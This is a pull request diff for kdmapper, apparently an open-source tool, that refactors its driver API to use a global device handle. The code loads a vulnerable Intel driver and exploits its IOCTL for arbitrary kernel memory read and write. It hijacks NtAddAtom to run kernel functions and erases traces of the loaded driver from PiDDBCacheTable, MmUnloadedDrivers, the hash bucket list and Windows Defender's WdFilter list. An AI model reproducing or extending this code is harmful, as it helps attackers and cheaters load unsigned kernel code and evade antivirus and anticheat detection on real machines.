### PR TITLE
Refactor driver API

### DIFF
--- a/kdmapper/include/intel_driver.hpp
+++ b/kdmapper/include/intel_driver.hpp
@@ -10,51 +10,52 @@
 namespace intel_driver
 {
 	constexpr ULONG32 ioctl1 = 0x80862007;
+	extern HANDLE hDevice;
 	extern ULONG64 ntoskrnlAddr;
 
-	bool ClearPiDDBCacheTable(HANDLE device_handle);
-	bool ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait);
-	bool ExReleaseResourceLite(HANDLE device_handle, PVOID Resource);
-	BOOLEAN RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer);
-	PVOID RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer);
-	nt::PiDDBCacheEntry* LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name);
-	PVOID ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize);
+	bool ClearPiDDBCacheTable();
+	bool ExAcquireResourceExclusiveLite(PVOID Resource, BOOLEAN wait);
+	bool ExReleaseResourceLite(PVOID Resource);
+	BOOLEAN RtlDeleteElementGenericTableAvl(PVOID Table, PVOID Buffer);
+	PVOID RtlLookupElementGenericTableAvl(nt::PRTL_AVL_TABLE Table, PVOID Buffer);
+	nt::PiDDBCacheEntry* LookupEntry(nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name);
+	PVOID ResolveRelativeAddress(_In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize);
 	bool AcquireDebugPrivilege();
 
-	uintptr_t FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask);
-	uintptr_t FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size);
-	uintptr_t FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask);
+	uintptr_t FindPatternAtKernel(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask);
+	uintptr_t FindSectionAtKernel(const char* sectionName, uintptr_t modulePtr, PULONG size);
+	uintptr_t FindPatternInSectionAtKernel(const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask);
 
-	bool ClearKernelHashBucketList(HANDLE device_handle);
-	bool ClearWdFilterDriverList(HANDLE device_handle);
+	bool ClearKernelHashBucketList();
+	bool ClearWdFilterDriverList();
 
 	bool IsRunning();
-	HANDLE Load();
-	bool Unload(HANDLE device_handle);
+	bool Load();
+	bool Unload();
 
-	bool MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size);
-	bool SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size);
-	bool GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address);
-	uint64_t MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size);
-	bool UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size);
-	bool ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size);
-	bool WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size);
-	bool WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size);
+	bool MemCopy(uint64_t destination, uint64_t source, uint64_t size);
+	bool SetMemory(uint64_t address, uint32_t value, uint64_t size);
+	bool GetPhysicalAddress(uint64_t address, uint64_t* out_physical_address);
+	uint64_t MapIoSpace(uint64_t physical_address, uint32_t size);
+	bool UnmapIoSpace(uint64_t address, uint32_t size);
+	bool ReadMemory(uint64_t address, void* buffer, uint64_t size);
+	bool WriteMemory(uint64_t address, void* buffer, uint64_t size);
+	bool WriteToReadOnlyMemory(uint64_t address, void* buffer, uint32_t size);
 	/*added by herooyyy*/
-	uint64_t MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size);
-	bool MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size);
-	BOOLEAN MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect);
+	uint64_t MmAllocateIndependentPagesEx(uint32_t size);
+	bool MmFreeIndependentPages(uint64_t address, uint32_t size);
+	BOOLEAN MmSetPageProtection(uint64_t address, uint32_t size, ULONG new_protect);
 	
-	uint64_t AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size);
+	uint64_t AllocatePool(nt::POOL_TYPE pool_type, uint64_t size);
 
-	bool FreePool(HANDLE device_handle, uint64_t address);
-	uint64_t GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name);
-	bool ClearMmUnloadedDrivers(HANDLE device_handle);
+	bool FreePool(uint64_t address);
+	uint64_t GetKernelModuleExport(uint64_t kernel_module_base, const std::string& function_name);
+	bool ClearMmUnloadedDrivers();
 	std::wstring GetDriverNameW();
 	std::wstring GetDriverPath();
 
 	template<typename T, typename ...A>
-	bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments) {
+	bool CallKernelFunction(T* out_result, uint64_t kernel_function_address, const A ...arguments) {
 		constexpr auto call_void = std::is_same_v<T, void>;
 
 		//if count of arguments is >4 fail
@@ -89,13 +90,13 @@ namespace intel_driver
 		uint8_t original_kernel_function[sizeof(kernel_injected_jmp)];
 		*(uint64_t*)&kernel_injected_jmp[2] = kernel_function_address;
 
-		static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtAddAtom");
+		static uint64_t kernel_NtAddAtom = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "NtAddAtom");
 		if (!kernel_NtAddAtom) {
 			Log(L"[-] Failed to get export ntoskrnl.NtAddAtom" << std::endl);
 			return false;
 		}
 
-		if (!ReadMemory(device_handle, kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp)))
+		if (!ReadMemory(kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp)))
 			return false;
 
 		if (original_kernel_function[0] == kernel_injected_jmp[0] &&
@@ -107,7 +108,7 @@ namespace intel_driver
 		}
 
 		// Overwrite the pointer with kernel_function_address
-		if (!WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp)))
+		if (!WriteToReadOnlyMemory(kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp)))
 			return false;
 
 		// Call function
@@ -125,6 +126,6 @@ namespace intel_driver
 		}
 
 		// Restore the pointer/jmp
-		return WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp));
+		return WriteToReadOnlyMemory(kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp));
 	}
 }

--- a/kdmapper/include/kdmapper.hpp
+++ b/kdmapper/include/kdmapper.hpp
@@ -13,5 +13,5 @@ namespace kdmapper
 	typedef bool (*mapCallback)(ULONG64* param1, ULONG64* param2, ULONG64 allocationPtr, ULONG64 allocationSize);
 
 	//Note: if you set PassAllocationAddressAsFirstParam as true, param1 will be ignored
-	ULONG64 MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1 = 0, ULONG64 param2 = 0, bool free = false, bool destroyHeader = true, AllocationMode mode = AllocationMode::AllocatePool, bool PassAllocationAddressAsFirstParam = false, mapCallback callback = nullptr, NTSTATUS* exitCode = nullptr);
+	ULONG64 MapDriver(BYTE* data, ULONG64 param1 = 0, ULONG64 param2 = 0, bool free = false, bool destroyHeader = true, AllocationMode mode = AllocationMode::AllocatePool, bool PassAllocationAddressAsFirstParam = false, mapCallback callback = nullptr, NTSTATUS* exitCode = nullptr);
 }

--- a/kdmapper/intel_driver.cpp
+++ b/kdmapper/intel_driver.cpp
@@ -65,6 +65,7 @@ typedef struct _UNMAP_IO_SPACE_BUFFER_INFO
 
 // End Command structures
 
+HANDLE intel_driver::hDevice = 0;
 ULONG64 intel_driver::ntoskrnlAddr = 0;
 std::string cachedDriverName = "";
 
@@ -122,7 +123,7 @@ bool intel_driver::AcquireDebugPrivilege() {
 	return true;
 }
 
-HANDLE intel_driver::Load() {
+bool intel_driver::Load() {
 	srand((unsigned)time(NULL) * GetCurrentThreadId());
 
 	//from https://github.com/ShoaShekelbergstein/kdmapper as some Drivers takes same device name
@@ -131,7 +132,7 @@ HANDLE intel_driver::Load() {
 		Log(L"[-] This means that there is a intel driver already loaded or another instance of kdmapper is running or kdmapper crashed and didn't unload the previous driver." << std::endl);
 		Log(L"[-] If you are sure that there is no other instance of kdmapper running, you can try to restart your computer to fix this issue." << std::endl);
 		Log(L"[-] If the problem persists, you can try to unload the intel driver manually (If the driver was loaded with kdmapper will have a random name and will be located in %temp%), if not, the driver name is iqvw64e.sys." << std::endl);
-		return INVALID_HANDLE_VALUE;
+		return false;
 	}
 
 	Log(L"[<] Loading vulnerable driver, Name: " << GetDriverNameW() << std::endl);
@@ -139,80 +140,80 @@ HANDLE intel_driver::Load() {
 	std::wstring driver_path = GetDriverPath();
 	if (driver_path.empty()) {
 		Log(L"[-] Can't find TEMP folder" << std::endl);
-		return INVALID_HANDLE_VALUE;
+		return false;
 	}
 
 	_wremove(driver_path.c_str());
 
 	if (!utils::CreateFileFromMemory(driver_path, reinterpret_cast<const char*>(intel_driver_resource::driver), sizeof(intel_driver_resource::driver))) {
 		Log(L"[-] Failed to create vulnerable driver file" << std::endl);
-		return INVALID_HANDLE_VALUE;
+		return false;
 	}
 
 	if (!AcquireDebugPrivilege()) {
 		Log(L"[-] Failed to acquire SeDebugPrivilege" << std::endl);
 		_wremove(driver_path.c_str());
-		return INVALID_HANDLE_VALUE;
+		return false;
 	}
 
 	if (!service::RegisterAndStart(driver_path, GetDriverNameW())) {
 		Log(L"[-] Failed to register and start service for the vulnerable driver" << std::endl);
 		_wremove(driver_path.c_str());
-		return INVALID_HANDLE_VALUE;
+		return false;
 	}
 
-	HANDLE result = CreateFileW(L"\\\\.\\Nal", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	hDevice = CreateFileW(L"\\\\.\\Nal", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 
-	if (!result || result == INVALID_HANDLE_VALUE)
+	if (!hDevice || hDevice == INVALID_HANDLE_VALUE)
 	{
 		Log(L"[-] Failed to load driver iqvw64e.sys" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
 	ntoskrnlAddr = utils::GetKernelModuleAddress("ntoskrnl.exe");
 	if (ntoskrnlAddr == 0) {
 		Log(L"[-] Failed to get ntoskrnl.exe" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
 	//check MZ ntoskrnl.exe
 	IMAGE_DOS_HEADER dosHeader = { 0 };
-	if (!intel_driver::ReadMemory(result, intel_driver::ntoskrnlAddr, &dosHeader, sizeof(IMAGE_DOS_HEADER)) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
+	if (!intel_driver::ReadMemory(intel_driver::ntoskrnlAddr, &dosHeader, sizeof(IMAGE_DOS_HEADER)) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
 		Log(L"[-] Can't exploit intel driver, is there any antivirus or anticheat running?" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
-	if (!intel_driver::ClearPiDDBCacheTable(result)) {
+	if (!intel_driver::ClearPiDDBCacheTable()) {
 		Log(L"[-] Failed to ClearPiDDBCacheTable" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
-	if (!intel_driver::ClearKernelHashBucketList(result)) {
+	if (!intel_driver::ClearKernelHashBucketList()) {
 		Log(L"[-] Failed to ClearKernelHashBucketList" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
-	if (!intel_driver::ClearMmUnloadedDrivers(result)) {
+	if (!intel_driver::ClearMmUnloadedDrivers()) {
 		Log(L"[!] Failed to ClearMmUnloadedDrivers" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
-	if (!intel_driver::ClearWdFilterDriverList(result)) {
+	if (!intel_driver::ClearWdFilterDriverList()) {
 		Log("[!] Failed to ClearWdFilterDriverList" << std::endl);
-		intel_driver::Unload(result);
-		return INVALID_HANDLE_VALUE;
+		intel_driver::Unload();
+		return false;
 	}
 
-	return result;
+	return true;
 }
 
-bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
+bool intel_driver::ClearWdFilterDriverList() {
 
 	auto WdFilter = utils::GetKernelModuleAddress("WdFilter.sys");
 	if (!WdFilter) {
@@ -232,7 +233,7 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 	uintptr_t RuntimeDriversList_Head = MpBmDocOpenRules + 0x70;
 	uintptr_t RuntimeDriversCount = MpBmDocOpenRules + 0x60;
 	uintptr_t RuntimeDriversArray = MpBmDocOpenRules + 0x68;
-	ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t));
+	ReadMemory(RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t));
 
 	uintptr_t MpFreeDriverInfoEx = KDSymbolsHandler::GetInstance()->GetOffset(L"MpFreeDriverInfoEx");
 	if (!MpFreeDriverInfoEx)
@@ -242,13 +243,13 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 	}
 	MpFreeDriverInfoEx += WdFilter;
 #else
-	auto RuntimeDriversList = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\xFF\x05", "xxx????xx");
+	auto RuntimeDriversList = FindPatternInSectionAtKernel("PAGE", WdFilter, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\xFF\x05", "xxx????xx");
 	if (!RuntimeDriversList) {
 		Log("[!] Failed to find WdFilter RuntimeDriversList" << std::endl);
 		return false;
 	}
 
-	auto RuntimeDriversCountRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\xFF\x05\x00\x00\x00\x00\x48\x39\x11", "xx????xxx");
+	auto RuntimeDriversCountRef = FindPatternInSectionAtKernel("PAGE", WdFilter, (PUCHAR)"\xFF\x05\x00\x00\x00\x00\x48\x39\x11", "xx????xxx");
 	if (!RuntimeDriversCountRef) {
 		Log("[!] Failed to find WdFilter RuntimeDriversCount" << std::endl);
 		return false;
@@ -263,7 +264,7 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 		48 8B 0D FC AA FA FF          mov     rcx, cs:qword_1C0021BF0
 		E9 21 FF FF FF                jmp     loc_1C007701A
 	*/
-	auto MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x89\x00\x08\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "x?xx???????????x");
+	auto MpFreeDriverInfoExRef = FindPatternInSectionAtKernel("PAGE", WdFilter, (PUCHAR)"\x89\x00\x08\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "x?xx???????????x");
 	if (!MpFreeDriverInfoExRef) {
 		/*
 			48 89 4A 08                   mov     [rdx+8], rcx
@@ -272,7 +273,7 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 			48 8B 0D 44 41 FA FF          mov     rcx, cs:qword_1C0023B90
 			E9 39 FF FF FF                jmp     loc_1C007F98A
 		*/
-		MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x89\x00\x08\x00\x00\x00\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "x?x???x???????????x");
+		MpFreeDriverInfoExRef = FindPatternInSectionAtKernel("PAGE", WdFilter, (PUCHAR)"\x89\x00\x08\x00\x00\x00\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "x?x???x???????????x");
 		if (!MpFreeDriverInfoExRef) {
 			Log("[!] Failed to find WdFilter MpFreeDriverInfoEx" << std::endl);
 			return false;
@@ -285,17 +286,17 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 
 	MpFreeDriverInfoExRef += 0x3; // skip until call instruction
 
-	RuntimeDriversList = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversList, 3, 7);
+	RuntimeDriversList = (uintptr_t)ResolveRelativeAddress((PVOID)RuntimeDriversList, 3, 7);
 	uintptr_t RuntimeDriversList_Head = RuntimeDriversList - 0x8;
-	uintptr_t RuntimeDriversCount = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversCountRef, 2, 6);
+	uintptr_t RuntimeDriversCount = (uintptr_t)ResolveRelativeAddress((PVOID)RuntimeDriversCountRef, 2, 6);
 	uintptr_t RuntimeDriversArray = RuntimeDriversCount + 0x8;
-	ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t));
-	uintptr_t MpFreeDriverInfoEx = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)MpFreeDriverInfoExRef, 1, 5);
+	ReadMemory(RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t));
+	uintptr_t MpFreeDriverInfoEx = (uintptr_t)ResolveRelativeAddress((PVOID)MpFreeDriverInfoExRef, 1, 5);
 #endif
 
 	auto ReadListEntry = [&](uintptr_t Address) -> LIST_ENTRY* { // Useful lambda to read LIST_ENTRY
 		LIST_ENTRY* Entry;
-		if (!ReadMemory(device_handle, Address, &Entry, sizeof(LIST_ENTRY*))) return 0;
+		if (!ReadMemory(Address, &Entry, sizeof(LIST_ENTRY*))) return 0;
 		return Entry;
 	};
 
@@ -304,9 +305,9 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 		Entry = ReadListEntry((uintptr_t)Entry + (offsetof(struct _LIST_ENTRY, Flink))))
 	{
 		UNICODE_STRING Unicode_String;
-		if (ReadMemory(device_handle, (uintptr_t)Entry + 0x10, &Unicode_String, sizeof(UNICODE_STRING))) {
+		if (ReadMemory((uintptr_t)Entry + 0x10, &Unicode_String, sizeof(UNICODE_STRING))) {
 			auto ImageName = std::make_unique<wchar_t[]>((ULONG64)Unicode_String.Length / 2ULL + 1ULL);
-			if (ReadMemory(device_handle, (uintptr_t)Unicode_String.Buffer, ImageName.get(), Unicode_String.Length)) {
+			if (ReadMemory((uintptr_t)Unicode_String.Buffer, ImageName.get(), Unicode_String.Length)) {
 				if (wcsstr(ImageName.get(), intel_driver::GetDriverNameW().c_str())) {
 
 					//remove from RuntimeDriversArray
@@ -314,10 +315,10 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 					PVOID SameIndexList = (PVOID)((uintptr_t)Entry - 0x10);
 					for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements
 						PVOID value = 0;
-						ReadMemory(device_handle, RuntimeDriversArray + (k * 8), &value, sizeof(PVOID));
+						ReadMemory(RuntimeDriversArray + (k * 8), &value, sizeof(PVOID));
 						if (value == SameIndexList) {
 							PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
-							WriteMemory(device_handle, RuntimeDriversArray + (k * 8), &emptyval, sizeof(PVOID));
+							WriteMemory(RuntimeDriversArray + (k * 8), &emptyval, sizeof(PVOID));
 							removedRuntimeDriversArray = true;
 							break;
 						}
@@ -331,26 +332,26 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 					auto NextEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Flink)));
 					auto PrevEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Blink)));
 
-					WriteMemory(device_handle, uintptr_t(NextEntry) + (offsetof(struct _LIST_ENTRY, Blink)), &PrevEntry, sizeof(LIST_ENTRY::Blink));
-					WriteMemory(device_handle, uintptr_t(PrevEntry) + (offsetof(struct _LIST_ENTRY, Flink)), &NextEntry, sizeof(LIST_ENTRY::Flink));
+					WriteMemory(uintptr_t(NextEntry) + (offsetof(struct _LIST_ENTRY, Blink)), &PrevEntry, sizeof(LIST_ENTRY::Blink));
+					WriteMemory(uintptr_t(PrevEntry) + (offsetof(struct _LIST_ENTRY, Flink)), &NextEntry, sizeof(LIST_ENTRY::Flink));
 
 					// decrement RuntimeDriversCount
 					ULONG current = 0;
-					ReadMemory(device_handle, RuntimeDriversCount, &current, sizeof(ULONG));
+					ReadMemory(RuntimeDriversCount, &current, sizeof(ULONG));
 					current--;
-					WriteMemory(device_handle, RuntimeDriversCount, &current, sizeof(ULONG));
+					WriteMemory(RuntimeDriversCount, &current, sizeof(ULONG));
 
 					// call MpFreeDriverInfoEx
 					uintptr_t DriverInfo = (uintptr_t)Entry - 0x20;
 
 					//verify DriverInfo Magic
 					USHORT Magic = 0;
-					ReadMemory(device_handle, DriverInfo, &Magic, sizeof(USHORT));
+					ReadMemory(DriverInfo, &Magic, sizeof(USHORT));
 					if (Magic != 0xDA18) {
 						Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
 					}
 					else {
-						CallKernelFunction<void>(device_handle, nullptr, MpFreeDriverInfoEx, DriverInfo);
+						CallKernelFunction<void>(nullptr, MpFreeDriverInfoEx, DriverInfo);
 					}
 
 					Log("[+] WdFilterDriverList Cleaned: " << ImageName << std::endl);
@@ -362,11 +363,11 @@ bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) {
 	return false;
 }
 
-bool intel_driver::Unload(HANDLE device_handle) {
+bool intel_driver::Unload() {
 	Log(L"[<] Unloading vulnerable driver" << std::endl);
 
-	if (device_handle && device_handle != INVALID_HANDLE_VALUE) {
-		CloseHandle(device_handle);
+	if (hDevice && hDevice != INVALID_HANDLE_VALUE) {
+		CloseHandle(hDevice);
 	}
 
 	if (!service::StopAndRemove(GetDriverNameW()))
@@ -397,7 +398,7 @@ bool intel_driver::Unload(HANDLE device_handle) {
 	return true;
 }
 
-bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size) {
+bool intel_driver::MemCopy(uint64_t destination, uint64_t source, uint64_t size) {
 	if (!destination || !source || !size)
 		return 0;
 
@@ -409,10 +410,10 @@ bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t 
 	copy_memory_buffer.length = size;
 
 	DWORD bytes_returned = 0;
-	return DeviceIoControl(device_handle, ioctl1, &copy_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
+	return DeviceIoControl(hDevice, ioctl1, &copy_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
 }
 
-bool intel_driver::SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size) {
+bool intel_driver::SetMemory(uint64_t address, uint32_t value, uint64_t size) {
 	if (!address || !size)
 		return 0;
 
@@ -424,10 +425,10 @@ bool intel_driver::SetMemory(HANDLE device_handle, uint64_t address, uint32_t va
 	fill_memory_buffer.length = size;
 
 	DWORD bytes_returned = 0;
-	return DeviceIoControl(device_handle, ioctl1, &fill_memory_buffer, sizeof(fill_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
+	return DeviceIoControl(hDevice, ioctl1, &fill_memory_buffer, sizeof(fill_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
 }
 
-bool intel_driver::GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address) {
+bool intel_driver::GetPhysicalAddress(uint64_t address, uint64_t* out_physical_address) {
 	if (!address)
 		return 0;
 
@@ -438,14 +439,14 @@ bool intel_driver::GetPhysicalAddress(HANDLE device_handle, uint64_t address, ui
 
 	DWORD bytes_returned = 0;
 
-	if (!DeviceIoControl(device_handle, ioctl1, &get_phys_address_buffer, sizeof(get_phys_address_buffer), nullptr, 0, &bytes_returned, nullptr))
+	if (!DeviceIoControl(hDevice, ioctl1, &get_phys_address_buffer, sizeof(get_phys_address_buffer), nullptr, 0, &bytes_returned, nullptr))
 		return false;
 
 	*out_physical_address = get_phys_address_buffer.return_physical_address;
 	return true;
 }
 
-uint64_t intel_driver::MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size) {
+uint64_t intel_driver::MapIoSpace(uint64_t physical_address, uint32_t size) {
 	if (!physical_address || !size)
 		return 0;
 
@@ -457,13 +458,13 @@ uint64_t intel_driver::MapIoSpace(HANDLE device_handle, uint64_t physical_addres
 
 	DWORD bytes_returned = 0;
 
-	if (!DeviceIoControl(device_handle, ioctl1, &map_io_space_buffer, sizeof(map_io_space_buffer), nullptr, 0, &bytes_returned, nullptr))
+	if (!DeviceIoControl(hDevice, ioctl1, &map_io_space_buffer, sizeof(map_io_space_buffer), nullptr, 0, &bytes_returned, nullptr))
 		return 0;
 
 	return map_io_space_buffer.return_virtual_address;
 }
 
-bool intel_driver::UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size) {
+bool intel_driver::UnmapIoSpace(uint64_t address, uint32_t size) {
 	if (!address || !size)
 		return false;
 
@@ -475,41 +476,41 @@ bool intel_driver::UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t
 
 	DWORD bytes_returned = 0;
 
-	return DeviceIoControl(device_handle, ioctl1, &unmap_io_space_buffer, sizeof(unmap_io_space_buffer), nullptr, 0, &bytes_returned, nullptr);
+	return DeviceIoControl(hDevice, ioctl1, &unmap_io_space_buffer, sizeof(unmap_io_space_buffer), nullptr, 0, &bytes_returned, nullptr);
 }
 
-bool intel_driver::ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) {
-	return MemCopy(device_handle, reinterpret_cast<uint64_t>(buffer), address, size);
+bool intel_driver::ReadMemory(uint64_t address, void* buffer, uint64_t size) {
+	return MemCopy(reinterpret_cast<uint64_t>(buffer), address, size);
 }
 
-bool intel_driver::WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) {
-	return MemCopy(device_handle, address, reinterpret_cast<uint64_t>(buffer), size);
+bool intel_driver::WriteMemory(uint64_t address, void* buffer, uint64_t size) {
+	return MemCopy(address, reinterpret_cast<uint64_t>(buffer), size);
 }
 
-bool intel_driver::WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size) {
+bool intel_driver::WriteToReadOnlyMemory(uint64_t address, void* buffer, uint32_t size) {
 	if (!address || !buffer || !size)
 		return false;
 
 	uint64_t physical_address = 0;
 
-	if (!GetPhysicalAddress(device_handle, address, &physical_address)) {
+	if (!GetPhysicalAddress(address, &physical_address)) {
 		Log(L"[-] Failed to translate virtual address 0x" << reinterpret_cast<void*>(address) << std::endl);
 		return false;
 	}
 
-	const uint64_t mapped_physical_memory = MapIoSpace(device_handle, physical_address, size);
+	const uint64_t mapped_physical_memory = MapIoSpace(physical_address, size);
 
 	if (!mapped_physical_memory) {
 		Log(L"[-] Failed to map IO space of 0x" << reinterpret_cast<void*>(physical_address) << std::endl);
 		return false;
 	}
 
-	bool result = WriteMemory(device_handle, mapped_physical_memory, buffer, size);
+	bool result = WriteMemory(mapped_physical_memory, buffer, size);
 
 #if defined(DISABLE_OUTPUT)
-	UnmapIoSpace(device_handle, mapped_physical_memory, size);
+	UnmapIoSpace(mapped_physical_memory, size);
 #else
-	if (!UnmapIoSpace(device_handle, mapped_physical_memory, size))
+	if (!UnmapIoSpace(mapped_physical_memory, size))
 		Log(L"[!] Failed to unmap IO space of physical address 0x" << reinterpret_cast<void*>(physical_address) << std::endl);
 #endif
 
@@ -517,7 +518,7 @@ bool intel_driver::WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address,
 	return result;
 }
 
-uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size)
+uint64_t intel_driver::MmAllocateIndependentPagesEx(uint32_t size)
 {
 	uint64_t allocated_pages{};
 
@@ -538,7 +539,7 @@ uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32
 	{
 		//Updated, tested from 1803 to 24H2
 		//KeAllocateInterrupt -> 41 8B D6 B9 00 10 00 00 E8 ?? ?? ?? ?? 48 8B D8
-		kernel_MmAllocateIndependentPagesEx = intel_driver::FindPatternInSectionAtKernel(device_handle, (char*)".text", intel_driver::ntoskrnlAddr,
+		kernel_MmAllocateIndependentPagesEx = intel_driver::FindPatternInSectionAtKernel((char*)".text", intel_driver::ntoskrnlAddr,
 			(BYTE*)"\x41\x8B\xD6\xB9\x00\x10\x00\x00\xE8\x00\x00\x00\x00\x48\x8B\xD8",
 			(char*)"xxxxxxxxx????xxx");
 		if (!kernel_MmAllocateIndependentPagesEx) {
@@ -548,7 +549,7 @@ uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32
 
 		kernel_MmAllocateIndependentPagesEx += 8;
 
-		kernel_MmAllocateIndependentPagesEx = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmAllocateIndependentPagesEx, 1, 5);
